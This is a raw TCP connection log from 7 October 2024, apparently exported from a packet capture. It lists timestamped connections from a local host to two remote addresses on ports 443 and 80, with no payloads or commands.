                                                                                                                                      Oct 7, 2024 03:23:04.827935934 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.845861912 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.846318007 CEST49781443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.846342087 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.846864939 CEST49781443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.846870899 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.882762909 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.883239985 CEST49782443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.883256912 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.883694887 CEST49782443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.883699894 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.907552004 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.907689095 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.907759905 CEST49779443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.910177946 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.910324097 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.910387993 CEST49778443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.925971031 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.926120043 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.926290989 CEST49780443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.934942961 CEST49779443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.934993982 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.935024977 CEST49779443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.935041904 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.937931061 CEST49778443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.937959909 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.937973022 CEST49778443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.937978983 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.940402031 CEST49780443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.940418959 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.940428972 CEST49780443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.940433025 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.945352077 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.945513964 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.945569992 CEST49781443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.949449062 CEST49783443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.949470043 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.949549913 CEST49783443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.950278044 CEST49784443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.950375080 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.950443983 CEST49784443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.950833082 CEST49785443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.950920105 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.950922966 CEST49781443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.950944901 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.950957060 CEST49781443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.950963974 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.950990915 CEST49785443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.983499050 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.983661890 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.983725071 CEST49782443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.991440058 CEST49786443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.991478920 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.991583109 CEST49786443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.994112015 CEST49785443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.994147062 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.994250059 CEST49782443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.994266033 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.994282007 CEST49782443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.994290113 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.994292021 CEST49786443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.994317055 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.017499924 CEST49783443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.017512083 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.017606974 CEST49784443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.017647982 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.060636997 CEST49787443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.060714006 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.060782909 CEST49787443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.060981989 CEST49787443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.061007977 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.649837971 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.651228905 CEST49786443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.651299000 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.651829004 CEST49786443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.651844025 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.666646957 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.667027950 CEST49783443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.667045116 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.667613983 CEST49783443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.667618036 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.674181938 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.674510002 CEST49785443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.674520016 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.675051928 CEST49785443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.675056934 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.681700945 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.682019949 CEST49784443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.682060957 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.682722092 CEST49784443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.682750940 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.696702003 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.696991920 CEST49787443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.697007895 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.697379112 CEST49787443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.697390079 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.750179052 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.750350952 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.750446081 CEST49786443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.752471924 CEST4978880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:05.757348061 CEST8049788185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.757441998 CEST4978880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:05.757905960 CEST4978880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:05.758212090 CEST49786443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.758232117 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.758244991 CEST49786443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.758253098 CEST4434978613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.762747049 CEST8049788185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.765929937 CEST49789443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.765959978 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.766033888 CEST49789443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.766165018 CEST49789443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.766177893 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.779004097 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.779151917 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.779221058 CEST49785443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.779316902 CEST49785443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.779324055 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.779336929 CEST49785443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.779341936 CEST4434978513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.781802893 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.781877041 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.781959057 CEST49784443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.783442020 CEST49790443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.783458948 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.783521891 CEST49790443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.784611940 CEST49790443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.784626007 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.784882069 CEST49784443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.784915924 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.784943104 CEST49784443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.784959078 CEST4434978413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.787843943 CEST49791443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.787930012 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.788009882 CEST49791443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.794395924 CEST49791443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.794435024 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.795857906 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.795934916 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.795994043 CEST49787443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.796053886 CEST49787443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.796072006 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.796094894 CEST49787443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.796106100 CEST4434978713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.798316002 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.798366070 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.798425913 CEST49783443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.800959110 CEST49792443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.801001072 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.801083088 CEST49792443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.801249027 CEST49783443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.801269054 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.801279068 CEST49783443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.801284075 CEST4434978313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.803831100 CEST49793443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.803852081 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.803940058 CEST49793443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.804234028 CEST49793443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.804235935 CEST49792443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:05.804244995 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:05.804253101 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.418025017 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.419233084 CEST49789443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.419245958 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.419907093 CEST49789443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.419912100 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.441770077 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.443084002 CEST49792443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.443103075 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.443470955 CEST49792443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.443475962 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.448576927 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.452008009 CEST49790443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.452029943 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.452403069 CEST49790443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.452406883 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.460920095 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.463958025 CEST49791443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.464031935 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.464499950 CEST49791443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.464514971 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.465888023 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.466944933 CEST49793443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.466968060 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.467279911 CEST49793443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.467284918 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.470586061 CEST8049788185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.470678091 CEST4978880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:06.518107891 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.518239975 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.518400908 CEST49789443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.518524885 CEST49789443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.518546104 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.518556118 CEST49789443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.518560886 CEST4434978913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.521027088 CEST49794443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.521054029 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.521143913 CEST49794443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.521254063 CEST49794443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.521265030 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.552397013 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.552542925 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.552655935 CEST49790443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.552762032 CEST49790443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.552767038 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.552809954 CEST49790443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.552814007 CEST4434979013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.555272102 CEST49795443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.555319071 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.556679010 CEST49795443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.556772947 CEST49795443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.556786060 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.565217018 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.565365076 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.565464020 CEST49791443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.565566063 CEST49791443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.565587997 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.565603018 CEST49791443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.565609932 CEST4434979113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.567106009 CEST49796443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.567138910 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.567209005 CEST49796443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.567313910 CEST49796443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.567329884 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.569756031 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.569811106 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.569866896 CEST49793443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.569966078 CEST49793443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.569974899 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.569984913 CEST49793443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.569994926 CEST4434979313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.571996927 CEST49797443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.572073936 CEST4434979713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.572226048 CEST49797443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.572341919 CEST49797443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.572375059 CEST4434979713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.697175980 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.697273016 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.697348118 CEST49792443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.697547913 CEST49792443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.697578907 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.697597027 CEST49792443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.697602987 CEST4434979213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.700314999 CEST49798443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.700381041 CEST4434979813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:06.700464964 CEST49798443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.700642109 CEST49798443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:06.700679064 CEST4434979813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.188481092 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.188960075 CEST49794443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.188968897 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.189368010 CEST49794443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.189373016 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.195274115 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.195645094 CEST49795443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.195663929 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.196250916 CEST49795443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.196257114 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.216769934 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.217099905 CEST49796443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.217118979 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.217539072 CEST49796443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.217545986 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.234268904 CEST4434979713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.234523058 CEST49797443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.234565020 CEST4434979713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.234963894 CEST49797443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.234970093 CEST4434979713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.291896105 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.292041063 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.292136908 CEST49794443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.292356014 CEST49794443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.292380095 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.292388916 CEST49794443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.292393923 CEST4434979413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.293030977 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.293186903 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.293248892 CEST49795443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.293673992 CEST49795443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.293687105 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.293698072 CEST49795443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.293701887 CEST4434979513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.296611071 CEST49799443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.296649933 CEST4434979913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.297430038 CEST49800443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.297463894 CEST49799443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.297470093 CEST4434980013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.297516108 CEST49800443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.297605038 CEST49799443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.297626972 CEST4434979913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.297676086 CEST49800443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.297683001 CEST4434980013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.314676046 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.314834118 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.314886093 CEST49796443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.314913034 CEST49796443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.314928055 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.314939976 CEST49796443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.314945936 CEST4434979613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.317440987 CEST49801443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:07.317529917 CEST4434980113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:07.317620993 CEST49801443192.168.2.413.107.246.45
